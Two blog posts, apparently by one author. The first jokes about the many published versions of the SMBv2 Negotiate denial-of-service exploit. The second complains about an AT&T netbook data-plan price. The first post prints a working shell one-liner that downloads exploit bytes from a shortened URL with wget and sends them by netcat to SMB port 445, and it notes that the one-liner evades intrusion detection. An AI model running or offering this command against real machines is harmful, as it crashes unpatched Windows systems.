The most implemented exploit ever: SMBv2 Negotiate DoS

Swinging by SecurityFocus' exploit list for the recent SMBv2 denial of service, I was immediately struck by the apparent silliness of listing five seperate but nearly identical implementations of the same bug. So struck, I daresay, that I could not resist writing my own stand-alone Ruby version, joking that maybe SecurityFocus will pick it up and make me famous.

Well, they did, and I did lol.

They also picked up I)ruid's much more interesting bash shell version. I thought that opening a socket straight on the command line was strictly the purview of Plan 9, but he proved me wrong.

The most "meta" version, so far, is Brent's wget-to-netcat implementation; I couldn't get it to function exactly as his tweet was written, but here's a version that Works For Me:

for i in `wget http://ur1.ca/bhe8 -q -O-|egrep 'oit.*".*"'|sed 's/s.*[<|=]//g'|sed 's/#.*//g'|sed 's/ "\(.*\)"/\1/'`;do echo -e -n $i;done|nc -w 1 127.0.0.1 445 > /dev/null

This has the added bonus of including some mild fragmentation, making IDS detection a little more squirrelly.

At any rate, I think this is all quite hilarious, and now I'm hopeful that the SMBv2 bug will be the widest-implemented DoS ever.

Update: |)ruid has published a version in Expect

Update: I've published a version in Perl

Update: Someone published a version in Java

AT&T Netbooks, only $1159

I saw an ad on TV about AT&T practically giving away Acer netbooks. Here's the link of note.

So, it's $199 for a netbook, as long as you sign a two-year contract for a DataConnect plan... and that's where they get you, as they say. $40/month, plus $199, makes this a $1159 computing device over two years. Oh, and the $40/month plan is capped at 200 mb/month. Uhhhhh yeah.

This seems to suck significantly more than I expected.

Back to Plan A, being an Android phone on T-Mobile and a tethered POS laptop. Now to figure out if their data plans are unlimited. (I've been having creeping problems with my BlackBerry 8310, which is why I'm looking at this now.)